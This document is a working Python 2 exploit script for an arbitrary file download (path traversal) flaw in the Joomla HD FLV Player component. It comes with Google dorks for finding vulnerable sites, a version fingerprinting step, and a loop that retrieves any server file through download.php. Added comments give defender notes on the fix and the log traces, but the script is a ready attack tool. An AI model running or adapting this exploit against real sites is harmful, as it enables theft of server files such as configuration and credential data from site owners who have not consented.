Joomla Components HD Flv Player Fix on Windows
  1. #!/usr/bin/env python
  2. #
  3. # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
  4. #
  5. # Exploit Author : Claudio Viviani
  6. #
  7. # Vendor Homepage : http://www.hdflvplayer.net/
  8. #
  9. # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
  10. #
  11. # Dork google 1: inurl:/component/hdflvplayer/
  12. # Dork google 2: inurl:com_hdflvplayer
  13. #
  14. # Date : 2014-11-11
  15. #
  16. # Tested on : BackBox 3.x/4.x
  17. #
  18. # Info:
  19. # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
  20. # The variable "f" is not sanitized.
  21. # Over 80.000 downloads (statistic reported on official site)
  22. #
  23. #
  24. # Video Demo: http://youtu.be/QvBTKFLBQ20
  25. #
  26. #
  27. # Http connection
  28. import urllib, urllib2
  29. # String manipulation
  30. import re
  31. # Time management
  32. import time
  33. # Args management
  34. import optparse
  35. # Error management
  36. import sys
  37.  
# ASCII-art banner. It is printed both when required options are missing
# (before the usage text) and at the start of a normal run; it carries the
# tool's version-scope line and the author's contact details verbatim.
banner = """
_______ __ ___ ___ ______
| _ .-----.-----.--------| .---.-. | Y | _ \\
|___| | _ | _ | | | _ | |. 1 |. | \\
|. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
|: 1 | |: | |: 1 /
|::.. . | |::.|:. |::.. . /
`-------' `--- ---`------'
_______ ___ ___ ___ _______ __
| _ | | | Y | | _ | .---.-.--.--.-----.----.
|. 1___|. | |. | | |. 1 | | _ | | | -__| _|
|. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
|: | |: 1 |: 1 | |: | |_____|
|::.| |::.. . |\:.. ./ |::.|
`---' `-------' `---' `---'

<= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d

Written by:

Claudio Viviani

http://www.homelab.it

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
  70.  
  71. # Check url
def checkurl(url):
    """Validate that *url* carries an explicit ``http://`` or ``https://`` scheme.

    Returns *url* unchanged when one of the two scheme prefixes is present.
    Otherwise prints an error line and terminates the process with exit
    status 1 (this function never returns in that case).
    """
    if url.startswith(("http://", "https://")):
        return url
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
  78.  
  79.  
def checkcomponent(url,headers):
    """Report whether the HD FLV Player component looks installed at *url*.

    Note: only a ``urllib2.Request`` object is constructed here; ``urlopen``
    is never called, so no HTTP request is sent and neither ``except``
    branch can be reached. The function therefore always prints "FOUND"
    and ``req`` is unused. The result is cosmetic, not a real presence check.
    """

    try:
        # Request() only builds the request object; nothing goes on the wire.
        req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
        sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
        print("")
    except urllib2.HTTPError:
        # Unreachable: the try body performs no network I/O.
        sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
        sys.exit(1)
    except urllib2.URLError:
        # Unreachable for the same reason. Python 2 print statement.
        print '[X] Connection Error'
  91.  
def checkversion(url,headers):
    """Print the version string found in the module's XML manifest.

    Fetches ``<url>/modules/mod_hdflvplayer/mod_hdflvplayer.xml`` and, for
    every line containing ``<version>``, prints the text between the first
    ``>`` and the following ``<`` on that line. Prints "Unknown" on an HTTP
    error and exits with status 1 on a connection-level error.

    The version is recoverable remotely only because the extension manifest
    is served to anonymous clients; denying direct web access to extension
    manifest files removes this fingerprinting signal.
    """

    try:
        req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
        # The response object is read to completion and never closed explicitly.
        response = urllib2.urlopen(req).readlines()

        for line_version in response:

            # find() == -1 means absent, so this reads "line contains <version>".
            if not line_version.find("<version>") == -1:

                # Non-greedy match: text between the first '>' and the next '<'.
                VER = re.compile('>(.*?)<').search(line_version).group(1)

                sys.stdout.write("\r[+] Checking Version: "+str(VER))
                print("")

    except urllib2.HTTPError:
        # Manifest not served (or not present): version stays unknown, no exit.
        sys.stdout.write("\r[+] Checking Version: Unknown")

    except urllib2.URLError:
        print("\n[X] Connection Error")
        sys.exit(1)
  113.  
def connection(url,headers,pathtrav):
    """Probe ``download.php`` with an increasing number of ``../`` prefixes.

    For depth 1..19 the script requests
    ``<url>/components/com_hdflvplayer/hdflvplayer/download.php?f=<"../"*depth><pathtrav>``
    and treats any non-empty body that does not contain the PHP warning text
    "failed to open stream" as the contents of the requested file. On the
    first such response it prompts for 'D' (save the body to the current
    directory via ``urllib.urlretrieve``) or 'R' (print the body) and returns
    True; if no depth succeeds it prints a failure line and returns None.

    Defender notes: the only attacker-controlled input on the server side is
    the ``f`` query parameter, so the fix is to resolve the requested path
    and refuse anything outside the intended download directory. In access
    logs a run of this tool appears as up to 19 requests to ``download.php``,
    roughly one per second, whose ``f`` value grows by one ``../`` each time.
    """

    char = "../"
    bar = "#"
    s = ""           # accumulated "../" prefix, one segment per attempt
    barcount = ""    # progress bar, one "#" per attempt

    for a in range(1,20):

        s += char
        barcount += bar
        sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
        sys.stdout.flush()

        try:
            req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
            response = urllib2.urlopen(req)

            content = response.read()

            # "failed to open stream" is the PHP warning a server emits when it
            # cannot read the file (if error display is enabled); an empty body
            # or that warning means this depth failed and the next one is tried.
            # Any other non-empty body is assumed to be the file itself.
            if content != "" and not "failed to open stream" in content:
                print("\n[!] VULNERABLE")
                print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
                print("")
                print("[+] Do you want [D]ownload or [R]ead the file?")
                print("[+]")
                sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")

                # Accepted answers after lower-casing the input.
                download = set(['d'])
                read = set(['r'])

                while True:
                    choice = raw_input().lower()   # Python 2 builtin
                    if choice in download:
                        # Saved under the basename of the requested path, in the CWD.
                        filedown = pathtrav.split('/')[-1]
                        urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
                        print("[!] DOWNLOADED!")
                        print("[!] Check file: "+filedown)
                        return True
                    elif choice in read:
                        print("")
                        print content          # Python 2 print statement
                        return True
                    else:
                        sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")

        except urllib2.HTTPError:
            # A 4xx/5xx at this depth is skipped silently; the loop continues.
            #print '[X] HTTP Error'
            pass
        except urllib2.URLError:
            # Connection-level failure is reported but does not stop the loop.
            print '\n[X] Connection Error'

        time.sleep(1)   # pace: one attempt per second
    print("\n[X] File not found or fixed component :(")
  168.  
# --- Script entry point -------------------------------------------------
# Runs at module load (there is no ``if __name__ == "__main__"`` guard).
# Required options: -t/--target (base URL) and -f/--file (path to request).
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                       )
commandList.add_option('-f', '--file', action="store",
                       help="Insert file to check",
                       )
# ``remainder`` (positional arguments) is never used.
options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

print(banner)

# checkurl() exits the process if the URL lacks an http:// or https:// scheme.
url = checkurl(options.target)
pathtrav = options.file

# Static desktop Chrome/36 User-Agent sent with every request. Because it
# never varies, it appears verbatim in server access logs for each run.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

# Each step prints a "\r"-prefixed status line that the called function
# then overwrites with its result.
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
checkcomponent(url,headers)
sys.stdout.write("\r[+] Checking Version: ")
checkversion(url,headers)
sys.stdout.write("\r[+] Exploiting...please wait:")
connection(url,headers,pathtrav)